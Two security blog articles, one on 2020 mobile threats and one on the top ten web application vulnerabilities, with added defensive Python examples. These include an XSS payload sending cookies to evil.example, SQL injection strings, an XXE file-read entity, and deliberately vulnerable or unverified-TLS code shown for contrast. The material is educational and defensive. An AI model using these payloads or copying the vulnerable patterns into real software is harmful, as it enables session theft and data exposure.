
Most Dangerous Mobile Security Threats of 2020

Smartphones are used everywhere, so the threats that target them are just as widespread. Our phones have become our most connected devices and, at the same time, our least secured. The most dangerous threats are the ones we fail to notice, and they will only grow in the near future. Here are the major mobile security threats every user should know about.

Cryptojacking

Cryptojacking is the covert use of your smartphone's processing power by an attacker to mine cryptocurrency.

Cryptojacking used to require the victim to unknowingly install a program that mined cryptocurrency in the background.

In-browser cryptojacking needs no separate program: the mining code runs as JavaScript inside a web page.

  • The threat actor compromises a website (or places the script in an ad that the site serves)
  • The crypto mining script executes when the user's browser loads the compromised page
  • Users unknowingly mine cryptocurrency on behalf of the threat actor for as long as the page stays open
  • When the mining effort contributes a new block, the threat actor, not the user, receives the reward in cryptocurrency
Insecure communications

The networks you communicate over are never fully secure, which leaves your device open to attack. Attackers set up fake access points where people use public Wi-Fi, such as coffee shops and airports, and give them generic, plausible names that fool even careful users.

Be cautious when connecting to public Wi-Fi. Use it only when you really need to, and never for anything sensitive such as banking.

Mobile ransomware

Ransomware that targets mobile devices specifically is called mobile ransomware.

A cybercriminal uses mobile malware to steal sensitive data from the phone or to lock the device, and then demands payment to return the data or unlock it. Victims are usually tricked into installing it: an apparently innocent file or app shared through social networks turns out to carry the ransomware.

Once on the device, the malware encrypts files or locks the screen and then demands payment, usually in Bitcoin. Paying is no guarantee: the attacker may or may not send the code that unlocks the phone or data.

Install apps only from Google Play or the App Store, never from third-party app stores.

Phishing attacks

Phishing is a social engineering attack used to steal user data, including login credentials and credit card numbers.

It occurs when an attacker, posing as a trusted entity, tricks the victim into opening an email, instant message or text message and acting on it.

Users can stay safe by not clicking unfamiliar links in email, and by typing URLs manually whenever possible.

SMS-based attacks

Phishing has moved from email into SMS (smishing). You receive a text with a link and are asked to open it to "verify" some information. To a novice user the link and the sender look genuine, but following the link exposes your device to attack and can hand over your confidential information. This is a growing threat to mobile devices.
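The phishing and SMS sections above both come down to one question: is this link what it pretends to be? The following is an added example, not code from the original article, showing the cheap checks a practitioner can run on a link before anyone taps it: plain HTTP, userinfo hiding the real host, raw IP addresses, punycode labels, and a brand name sitting in a hostname whose registrable domain is not the brand's. The brand allow-list (`KNOWN_DOMAINS`, with the hypothetical "examplebank") and every URL in the tests are constructed for the example.

```python
import ipaddress
from typing import Dict, List, Set
from urllib.parse import urlsplit

# Constructed allow-list for the example: the brands the user deals with and
# the registrable domains those brands actually use. In practice this comes
# from a maintained list, not from a literal in the code.
KNOWN_DOMAINS: Dict[str, Set[str]] = {
    "examplebank": {"examplebank.com"},
}


def registrable_domain(host: str) -> str:
    """Naive registrable-domain extraction (last two labels).

    Production code should use the Public Suffix List so that
    'example.co.uk' is not reduced to 'co.uk'.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def check_link(url: str) -> List[str]:
    """Return a list of warning strings for a URL received by SMS or email.

    An empty list means none of the cheap heuristics fired; it does not
    prove the link is safe.
    """
    findings: List[str] = []
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()

    if parts.scheme not in ("http", "https"):
        findings.append(f"unexpected scheme {parts.scheme!r}")
    elif parts.scheme == "http":
        findings.append("plain HTTP: anything typed into the page travels in clear")

    # https://examplebank.com@evil.example/ : the part before '@' is userinfo;
    # the browser actually connects to evil.example
    if "@" in parts.netloc:
        findings.append("userinfo before '@' hides the real host")

    try:
        ipaddress.ip_address(host)
        findings.append("raw IP address instead of a domain name")
    except ValueError:
        pass

    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append("punycode label: possible homograph of a familiar name")

    reg = registrable_domain(host)
    for brand, domains in KNOWN_DOMAINS.items():
        if brand in host.replace("-", "") and reg not in domains:
            findings.append(f"mentions {brand!r} but the registrable domain is {reg!r}")

    if len(host) > 60 or host.count(".") >= 5:
        findings.append("unusually long or deeply nested hostname")

    return findings
```

The brand check is the one that catches the typical smishing link, where the familiar name is placed in a subdomain of a throwaway registrable domain; the other checks are cheap enough to keep even though each alone has benign hits.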

Botnet attacks

The word botnet is a blend of "robot" and "network".

A botnet is a set of internet-connected devices, each running one or more bots. Botnets are used to perform distributed denial of service (DDoS) attacks, send spam, steal data, and give the attacker access to each device and its network connection.

A botnet attack first requires building the botnet, the army of infected devices. Once the attack is launched, the bots send network requests to the target system in huge volume, anything from bulk email messages to simple ping messages. The flood can slow the network or server, make it unavailable to legitimate users, or freeze it temporarily.

Distributed denial of service (DDoS) is the most common botnet attack: many bot devices send a large number of simultaneous requests or packets at the targeted system.

Installing effective antivirus/anti-malware software helps keep your own device from being recruited into a botnet.
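From the target's side, the two flood shapes described above (one bot hammering away, or many bots each sending a little) look different in a web server log. The following is an added example, not part of the original article, that buckets Common Log Format lines into fixed time windows and flags both shapes. The log lines are constructed inside `build_sample()` and the thresholds (`per_ip_limit`, `total_limit`, `min_sources`) are illustrative; real values come from a baseline of the site's normal traffic.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple, Optional, Tuple

# Common Log Format, e.g.
# 203.0.113.7 - - [10/Mar/2020:10:00:12 +0000] "GET /login HTTP/1.1" 200 512
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


class Record(NamedTuple):
    ip: str
    t: int      # epoch seconds
    path: str


Alert = Tuple[str, int, str, int]  # (kind, window_start_epoch, source, request_count)


def parse_line(line: str) -> Optional[Record]:
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return Record(m["ip"], int(ts.timestamp()), m["path"])


def find_floods(lines, window: int = 10, per_ip_limit: int = 20,
                total_limit: int = 50, min_sources: int = 10) -> List[Alert]:
    """Bucket requests into fixed windows and flag two flood shapes:
    one source far above normal (a single bot), and many sources that are
    each under the per-IP limit but together exceed the window budget
    (distributed, 'low and slow' per host)."""
    by_window: Dict[int, List[Record]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_window[rec.t // window].append(rec)

    alerts: List[Alert] = []
    for w, recs in sorted(by_window.items()):
        start = w * window
        per_ip = Counter(r.ip for r in recs)
        for ip, n in per_ip.most_common():
            if n > per_ip_limit:
                alerts.append(("single-source", start, ip, n))
        if (len(recs) > total_limit and len(per_ip) >= min_sources
                and max(per_ip.values()) <= per_ip_limit):
            alerts.append(("distributed", start, "*", len(recs)))
    return alerts


def build_sample() -> List[str]:
    """Constructed log lines (not captured traffic) covering three 10 s windows:
    normal browsing, one bot flooding /login, then 30 bots at 2 requests each."""
    fmt = '{ip} - - [10/Mar/2020:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" 200 512'
    lines = []
    for i, ip in enumerate(["198.51.100.1", "198.51.100.2", "198.51.100.3"]):
        lines.append(fmt.format(ip=ip, sec=i, path="/"))
        lines.append(fmt.format(ip=ip, sec=i + 1, path="/about"))
    for i in range(30):
        lines.append(fmt.format(ip="203.0.113.7", sec=10 + i % 5, path="/login"))
    for i in range(30):
        ip = f"203.0.113.{100 + i}"
        lines.append(fmt.format(ip=ip, sec=20 + i % 5, path="/search"))
        lines.append(fmt.format(ip=ip, sec=21 + i % 5, path="/search"))
    return lines
```

The distributed rule is the important one: a per-IP threshold alone never fires against a botnet whose members each stay just under it, which is exactly why attackers spread the load.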

User & device authentication

Most mail apps and browsers offer to remember your passwords and keep your data on the device. If the device is stolen, those stored credentials and the data they unlock are at risk. This is one of the major threats to mobile devices, because they hold our most valuable personal information.

The smartphone blurs the boundary between professional and personal life, and its users are up to three times more likely to fall victim to mobile threats. Safe browsing, spotting suspicious files and phishing emails, accessing data safely on public Wi-Fi, and downloading only from trusted sources are the habits a user must keep up. Beyond these, mobile security software is available from Google Play and the App Store to add protection to your device.

Understanding these common threats and applying the recommended measures will help you protect the data on your smartphone.

Solutions: Most Dangerous Mobile Security Threats of 2020

Preventing mobile security threats helps organizations and individuals protect their devices, apps, users and content from attack. Security teams can do this with tools that scan devices and configurations on the network, and with response procedures ready for when malware is found on the network.

1. Cryptojacking attacks

These steps minimize the risk of your organization falling into the trap:

Install an ad-blocking or anti-crypto mining extension on web browsers.

Since cryptojacking scripts are often delivered through web ads, an ad blocker such as Adblock Plus stops many of them. Dedicated extensions such as No Coin and MinerBlock are designed specifically to detect and block mining scripts.

Keep your web filtering tools up to date.

If you identify a web page that is delivering crypto jacking scripts, make sure your users are blocked from accessing it again.

Maintain browser extensions.

Browser extensions are meant to make our tasks simpler, but some are themselves a trap set by an attacker to run mining scripts. Install only the extensions you need, from known publishers, and review the installed list periodically.

Use mobile device management (MDM) solution to better control users’ devices.

An MDM solution complements bring-your-own-device (BYOD) policies for preventing illicit crypto mining, because it can control which apps and extensions are present on users' devices. MDM solutions tend to be geared toward larger enterprises, and smaller companies often cannot afford them. Experts note, however, that mobile devices are not at as much risk as desktop computers and servers: with less processing power, they yield little profit for the attacker.

2. Insecure communications

Here are a few best practices for mobile apps (Android in particular) that reduce the risks of insecure communication.

Assume the network layer is hostile: it is fully capable of eavesdropping, so treat it as insecure.

  • Apply TLS to every transport channel the mobile app uses to send sensitive information, session tokens or other sensitive data to a backend API or web service.
  • When the app loads content via the browser/WebKit, make sure outside entities such as third-party analytics companies and social networks are fetched over their TLS endpoints as well. Avoid mixed TLS/plaintext sessions, which can expose the user's session ID.
  • Use only strong, standard cipher suites with suitable key lengths.
  • Use certificates signed by a trusted CA provider.
  • Consider certificate pinning for security-conscious applications, and never accept self-signed certificates.
  • Always require full certificate chain verification (TLS, the successor of SSL).
  • Establish a connection only after verifying the identity of the endpoint server against trusted certificates in the keychain.
  • Build a UI that alerts users when the mobile app detects an invalid certificate.
  • Avoid sending sensitive data over alternate channels (e.g. SMS, MMS or notifications).
  • Apply a separate layer of encryption to sensitive data before it enters the TLS channel. If a vulnerability is found in the TLS implementation, the encrypted payload remains a second line of defence for confidentiality.
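The chain-verification, hostname-check and pinning items above are easy to state and easy to get wrong in code. The following is an added example, not code from the original article or from any Android library, using Python's standard `ssl` module as a stand-in for the mobile client: it builds a hardened client context beside the insecure one this list warns against, and enforces a SHA-256 pin on the server's leaf certificate. `connect_pinned` needs a live server and is not exercised offline; the DER bytes in the tests are constructed placeholders for a real certificate.

```python
import hashlib
import socket
import ssl
from typing import Iterable


def make_client_context() -> ssl.SSLContext:
    """Client context that verifies the CA chain and the hostname and
    refuses anything below TLS 1.2. Chain and hostname verification are
    already the defaults of create_default_context(); they are set again
    here so the intent is visible in code review."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def make_insecure_context() -> ssl.SSLContext:
    """The pattern this list warns against: verification switched off, so any
    certificate, self-signed or not, is accepted and a fake access point can
    sit in the middle. Shown for contrast only; never ship this."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False  # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_hardened(ctx: ssl.SSLContext) -> bool:
    return (ctx.verify_mode == ssl.CERT_REQUIRED
            and bool(ctx.check_hostname)
            and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)


def cert_pin(der_cert: bytes) -> str:
    """Pin value: SHA-256 over the DER-encoded certificate."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert: bytes, pinned: Iterable[str]) -> bool:
    """Accept the certificate only if its hash is in the pin set. Keep a
    backup pin for the next certificate so rotation does not lock users out."""
    return cert_pin(der_cert) in set(pinned)


def connect_pinned(host: str, port: int, pinned: Iterable[str], timeout: float = 5.0) -> str:
    """Open a TLS connection, let the context verify chain and hostname, then
    enforce the pin on the leaf certificate. Returns the negotiated version."""
    ctx = make_client_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            leaf = tls.getpeercert(binary_form=True)
            if leaf is None or not pin_matches(leaf, pinned):
                raise ssl.SSLError(f"certificate pin mismatch for {host}")
            return tls.version() or "unknown"
```

Pinning is applied after, not instead of, chain and hostname verification, so a pin mismatch is an extra failure condition rather than a replacement for the CA check.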

3. Mobile ransomware

  • Install applications only from the official stores, Google Play or the App Store. To be sure nothing reaches your device from an untrusted source, check the Android setting: on older versions go to Settings, Security and make sure "Unknown sources" is not ticked; on Android 8 and later the permission is granted per app under "Install unknown apps", so review which apps hold it.
  • Check regularly for updates to your installed applications and to the device OS. You can set installed apps to update automatically, and you should install system updates as soon as an over-the-air (OTA) update arrives.
  • Install a reputable security solution. Using only the official stores and keeping apps updated does not guarantee safety: malware has made it into Google Play, and it can also spread through exploit kits that use yet-unknown vulnerabilities.

4. Phishing attacks

  • Think Before You Click!
  • Keep Your Browser Up to Date
  • Keep Informed About Phishing Techniques
  • Check Your Online Accounts Regularly
  • Use Firewalls

5. SMS–based attacks

  • Think before you click a link from SMS
  • Do not open spam messages
  • Keep informed about phishing techniques

6. Botnets attack

To avoid compromise, use only licensed, genuine software. Keep your mobile updated with the latest security patches. Install an anti-malware solution and update it regularly. On the computers you connect the phone to, disable Autoplay/Autorun for removable drives.

Always protect your device from Trojans and other threats by using effective anti-malware software.

7. User & device authentication

  • Think before allowing mail apps and browsers to store your passwords and data on the device, and pair any stored credentials with a strong screen lock and remote-wipe capability.

Remember there is no single fool-proof way to avoid mobile security threats.

– Habeeb Rahman


Top 10 Vulnerabilities in Web Applications and How to Tackle Them

Before we look at the vulnerabilities, it helps to know that open communities such as OWASP continually track these weaknesses and publish guidance on resolving them. The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase and maintain web applications and APIs that can be trusted.

Now let us check the top 10 vulnerabilities in web applications and how to tackle these vulnerabilities.

1. Cross-Site Scripting (XSS)

It is a very common application-layer web attack. In XSS the attacker injects script into a web page, and that script is executed on the client side, in the victim's browser, with the page's privileges. It affects any page that renders untrusted data into HTML or JavaScript without encoding it. The injected script can run on every page load or on any other event the attacker chooses.

XSS is mainly used to tamper with and steal user data, such as session cookies. It usually targets the user rather than the application itself.

We prevent XSS by separating untrusted data from active browser content: encode output for the context it lands in (HTML body, attribute, JavaScript, URL) and add a Content Security Policy. Frameworks such as React or Ruby on Rails escape output by default, which removes most of the risk, but the escape hatches (React's dangerouslySetInnerHTML, Rails's raw and html_safe) still need care.
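Output encoding is context-dependent, which is the part most explanations skip. The following is an added example, not code from the original article, that renders the same attacker-controlled string into four contexts with the encoding each one needs, alongside the vulnerable concatenation. The payload and the template fragments are constructed for the example; Python's standard library is used so it runs without a web framework.

```python
import html
import json
from urllib.parse import quote

# Constructed attacker input: the classic cookie-stealing payload.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_vulnerable(name: str) -> str:
    """Untrusted data dropped straight into markup: the <script> survives."""
    return f"<p>Welcome, {name}</p>"


def render_html_text(name: str) -> str:
    """HTML text context: escape & < > " ' so the browser treats the data as text."""
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


def render_html_attr(value: str) -> str:
    """Attribute context: quote the attribute AND escape the value, otherwise a
    stray double quote lets the attacker append on* event handlers."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_js_value(value: str) -> str:
    """Script context: JSON-encode, then write < and > as \\u003c / \\u003e so a
    '</script>' inside the data cannot close the block early."""
    encoded = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<script>var user = {encoded};</script>"


def render_url_param(value: str) -> str:
    """URL parameter context: percent-encode everything, including & = ? /."""
    return f'<a href="/profile?u={quote(value, safe="")}">profile</a>'
```

The attribute and script cases are where html.escape alone is not enough: an unquoted attribute needs no quote character to break out of, and a script block ends at the first `</script>` regardless of JavaScript string syntax.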

2. SQL Injection

It is an application security weakness that lets an attacker read confidential data such as passwords, or alter data in the database. It occurs when untrusted input from web forms or other sources becomes part of a SQL query.

Web applications use SQL queries to talk to the database. SQL injection occurs when the application builds a query by concatenating unvalidated input, so an attacker can change the query's structure and make the database execute unexpected commands.

The primary defence is to keep data out of the query text: use parameterized queries (prepared statements) or a safe ORM API. Input validation and SQL controls such as LIMIT within queries further reduce the damage from mass record disclosure if an injection does slip through.
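Seeing the two query styles side by side makes the fix concrete. The following is an added example, not code from the original article, using an in-memory SQLite database with constructed rows: the concatenated query is bypassed by the classic `' OR '1'='1` and leaks hashes through a UNION, while the parameterized one treats the same strings as plain usernames.

```python
import sqlite3
from typing import List, Tuple


def setup_db() -> sqlite3.Connection:
    """In-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-a", "admin"), ("bob", "hash-b", "user"), ("carol", "hash-c", "user")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """Untrusted input concatenated into the SQL text: the injection bug."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """Parameterized query: the value never becomes part of the SQL grammar.
    LIMIT 1 bounds what a single lookup can ever return."""
    sql = "SELECT username, role FROM users WHERE username = ? LIMIT 1"
    return conn.execute(sql, (username,)).fetchall()


# Two constructed payloads an attacker would try in the username field.
BYPASS = "' OR '1'='1"
DUMP_HASHES = "x' UNION SELECT password_hash, role FROM users --"
```

Note that the safe version does no escaping of its own: the driver sends the value separately from the statement, which is why quoting tricks have nothing to attack.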

3. LDAP Injection

This is similar to SQL injection: the attacker places metacharacters in user input fields to change the meaning of a directory query and gain access beyond what was intended. It can lead to information theft, session hijacking, website defacement and other problems.

LDAP (Lightweight Directory Access Protocol) injection works by inserting crafted input into LDAP statements built from client-provided data. If the application does not properly validate or escape the input, attackers can construct LDAP statements that execute with the application's permissions. Such queries can read, modify or delete anything in the LDAP tree the application can reach, with disastrous results.

To handle these injections, use a safe API that escapes LDAP metacharacters (or a library that builds filters from parameters), validate input against an allow-list, and bind the application to the directory with the least privilege it needs.

4. Cross-Site Request Forgery (CSRF)

CSRF tricks the victim's browser into sending a request the user did not intend to an application where the user is already authenticated. Because the browser automatically attaches the session cookie, the application treats the forged request as the user's own, and the attacker can use the application's data and functions as that user. The defences are anti-CSRF tokens tied to the session, SameSite cookie attributes and Origin header checks. Attackers may use XSS to defeat whatever CSRF defence the application employs, so preventing XSS is also part of preventing CSRF.
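The defences listed above fit in a few lines once the request handling is explicit. The following is an added example, not code from the original article or any web framework: a session-bound synchronizer token (HMAC over the session ID and a random nonce), a SameSite cookie, and a transfer endpoint that refuses the forged cross-site POST. The request dicts, the server key and the hypothetical origin `https://bank.example` are constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Any, Dict

# Per-deployment secret. Assumption for the example: generated at import time;
# a real service loads it from configuration so every instance shares it.
SERVER_KEY = secrets.token_bytes(32)

# Hypothetical origin of the application's own pages.
SITE_ORIGIN = "https://bank.example"


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Token = random nonce + HMAC(key, session_id:nonce). Binding it to the
    session means a token captured from another session does not verify."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)  # constant-time comparison


def session_cookie(session_id: str) -> str:
    """SameSite=Lax stops the browser attaching the cookie to cross-site POSTs;
    Secure and HttpOnly keep it off plaintext connections and away from script."""
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def handle_transfer(request: Dict[str, Any], key: bytes = SERVER_KEY) -> str:
    """Minimal state-changing endpoint. 'request' is a constructed dict with
    'method', 'cookies', 'headers' and 'form' entries standing in for a framework object."""
    session_id = request["cookies"].get("session", "")
    if not session_id:
        return "401 no session"
    if request["method"] != "POST":
        return "405 state change requires POST"
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-origin request"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", ""), key):
        return "403 csrf token missing or invalid"
    return "200 transferred"
```

The attacker's page can make the victim's browser send the POST with the cookie attached, but it cannot read the token out of the victim's page (same-origin policy), so the token check fails; the Origin check and SameSite cookie are independent layers in case the token handling has a bug.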

5. Insecure cryptographic storage

It occurs when sensitive data is not stored securely. Make sure all sensitive data is encrypted at rest and that keys are managed securely: kept apart from the data, access-controlled and rotated.

Use a well-vetted standard algorithm and mode (for example AES-GCM for data), and store passwords only as salted hashes from a deliberately slow function such as bcrypt, scrypt or Argon2, never encrypted or hashed with a fast general-purpose hash.

Never roll your own cryptography, since you cannot tell whether it is secure. Do not ship or deploy with any default credentials, particularly for admin users.
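Password storage is the most common instance of this flaw, and the standard library already has what is needed. The following is an added example, not code from the original article, showing the insecure pattern (fast, unsalted hash) next to salted scrypt with the cost parameters stored alongside the hash, so they can be raised later without breaking existing records. The parameter values are a reasonable 2020-era starting point, not a recommendation for any particular deployment.

```python
import base64
import hashlib
import hmac
import os


def insecure_hash(password: str) -> str:
    """What the warning is about: a fast, unsalted hash. Equal passwords give
    equal hashes, and a GPU tries billions of candidates per second."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, *, n: int = 2 ** 14, r: int = 8, p: int = 1) -> str:
    """Salted scrypt from the standard library. Format:
    scrypt$n$r$p$<base64 salt>$<base64 key>, so the cost is self-describing."""
    salt = os.urandom(16)
    dk = hashlib.scrypt(password.encode(), salt=salt, n=n, r=r, p=p, dklen=32)
    return "$".join(["scrypt", str(n), str(r), str(p),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored parameters and compare in constant time."""
    try:
        algo, n, r, p, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    calc = hashlib.scrypt(password.encode(), salt=salt,
                          n=int(n), r=int(r), p=int(p), dklen=len(expected))
    return hmac.compare_digest(calc, expected)
```

Two hashes of the same password differ because of the random salt, which is exactly what defeats precomputed tables; the constant-time compare closes the timing side channel a plain `==` would open.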

6. Broken Authentication

Broken authentication happens when functions related to authentication and session management are implemented incorrectly, allowing attackers to compromise passwords, keys or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.

Implement multi-factor authentication to blunt automated credential stuffing, brute force and stolen-credential reuse attacks. Also rate-limit and log failed logins, issue a new random session ID on login, and invalidate sessions on logout and after a period of inactivity.

7. Sensitive Data Exposure

Many web applications and APIs do not properly protect sensitive data such as financial, healthcare, and PII (Personally Identifiable Information). Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection such as encryption at rest or in transit and requires special precautions when exchanged between browser and server.

We can prevent this by classifying the data the application stores, processes and transmits, and applying controls according to that classification.

Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Remember, data that is not retained cannot be stolen.

8. XML External Entities (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files through the file:// URI handler, reach internal file shares, scan internal ports, cause denial of service, and in some configurations achieve remote code execution.

Whenever possible, use less complex data formats such as JSON and avoid serializing sensitive data. Where XML is required, disable DTD processing and external entity resolution in every parser the application uses, and validate incoming XML against a schema.

Also, patch or upgrade all XML processors and libraries used by web applications or by the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.
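Parser defaults differ from library to library, so the dependable control is to refuse any document that carries a DTD at all, since that is where external, parameter and recursive entities are declared and ordinary data exchange never needs one. The following is an added example, not code from the original article, with a constructed XXE payload and a benign document; for production code the defusedxml package wraps the standard parsers with the same policy.

```python
import xml.etree.ElementTree as ET
from typing import List, Optional

# Constructed documents: one with a DTD declaring an external entity that
# points at a local file, one plain.
MALICIOUS = """<?xml version="1.0"?>
<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<order><item>&xxe;</item></order>"""

BENIGN = "<order><item>widget</item><qty>2</qty></order>"


class UnsafeXML(ValueError):
    pass


def is_safe_to_parse(xml_text: str) -> bool:
    """Reject any document carrying a DTD. XML keywords are case-sensitive,
    so the uppercase check is exact, not a heuristic."""
    return "<!DOCTYPE" not in xml_text and "<!ENTITY" not in xml_text


def parse_strict(xml_text: str) -> ET.Element:
    if not is_safe_to_parse(xml_text):
        raise UnsafeXML("DTD / entity declarations are not accepted")
    return ET.fromstring(xml_text)


def order_items(xml_text: str) -> List[Optional[str]]:
    """Example consumer: the item names from an order document."""
    root = parse_strict(xml_text)
    return [item.text for item in root.findall("item")]
```

Rejecting the DTD up front also stops the "billion laughs" internal-entity expansion, which needs no external access and would otherwise exhaust memory in a parser that is otherwise safely configured.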

9. Broken Access Control

Restrictions on the privileges of authenticated users are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.

The solution is to implement access control mechanisms once, server-side, and reuse them throughout the application, denying by default and enforcing record ownership on every object lookup. Also minimize CORS usage: allow only an explicit list of trusted origins rather than reflecting whatever Origin the request carries.
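The "implement once, reuse everywhere" advice is best seen as code. The following is an added example, not from the original article or any framework: an ownership rule defined in one place and applied to an object lookup (beside the vulnerable lookup that lets any logged-in user walk the ID space), a role decorator for admin-only functions, and a CORS helper that answers only for an allow-listed origin. The users, documents and origins are constructed for the example.

```python
from dataclasses import dataclass
from functools import wraps
from typing import Callable, Dict, Optional


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


class Forbidden(PermissionError):
    pass


# Constructed records keyed by a sequential ID, the pattern attackers enumerate.
DOCUMENTS: Dict[int, Dict[str, object]] = {
    1: {"owner": 10, "title": "payslip-alice.pdf"},
    2: {"owner": 20, "title": "payslip-bob.pdf"},
}

# Origins allowed to call the API cross-site. Assumed values for the example.
ALLOWED_ORIGINS = {"https://app.example", "https://admin.example"}


def can_read(user: User, doc: Dict[str, object]) -> bool:
    """One rule, defined once: admins read everything, users read what they own."""
    return user.role == "admin" or doc["owner"] == user.id


def get_document_vulnerable(user: User, doc_id: int) -> Dict[str, object]:
    """Authentication only. Any logged-in user can fetch any ID (IDOR)."""
    return DOCUMENTS[doc_id]


def get_document(user: User, doc_id: int) -> Dict[str, object]:
    doc = DOCUMENTS.get(doc_id)
    # Same error for 'missing' and 'not yours', so the ID space cannot be mapped.
    if doc is None or not can_read(user, doc):
        raise Forbidden(f"user {user.id} may not read document {doc_id}")
    return doc


def require_role(role: str) -> Callable:
    """Route-level check for privileged functions; reused, not re-coded per view."""
    def decorator(fn: Callable) -> Callable:
        @wraps(fn)
        def wrapper(user: User, *args, **kwargs):
            if user.role != role:
                raise Forbidden(f"role {role!r} required")
            return fn(user, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def delete_document(user: User, doc_id: int) -> bool:
    return DOCUMENTS.pop(doc_id, None) is not None


def cors_headers(origin: Optional[str]) -> Dict[str, str]:
    """Answer only for origins on the allow-list; never reflect the request's
    Origin back, and never combine '*' with credentials."""
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}
```

The check lives next to the data access rather than in the page that calls it, so a new endpoint that fetches documents cannot forget it; that is what "implement once and reuse" buys.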

10. Security Misconfiguration

Security misconfiguration is the most commonly seen issue. It usually results from insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages that leak sensitive information. All operating systems, frameworks, libraries and applications must not only be securely configured but also patched and upgraded in a timely fashion.

Avoid this with a repeatable hardening process: change or remove every default account and credential, disable features and services you do not need, turn off detailed error output in production, and verify that each environment (development, staging, production) is configured the same way.

The aim of this article is to give a good insight into common flaws that can lead to modern data breaches and could make web applications vulnerable to various attacks.

As the saying goes, "prevention is better than cure": adopt proactive, defensive security measures beforehand rather than only after a breach has happened.

Bharath Varma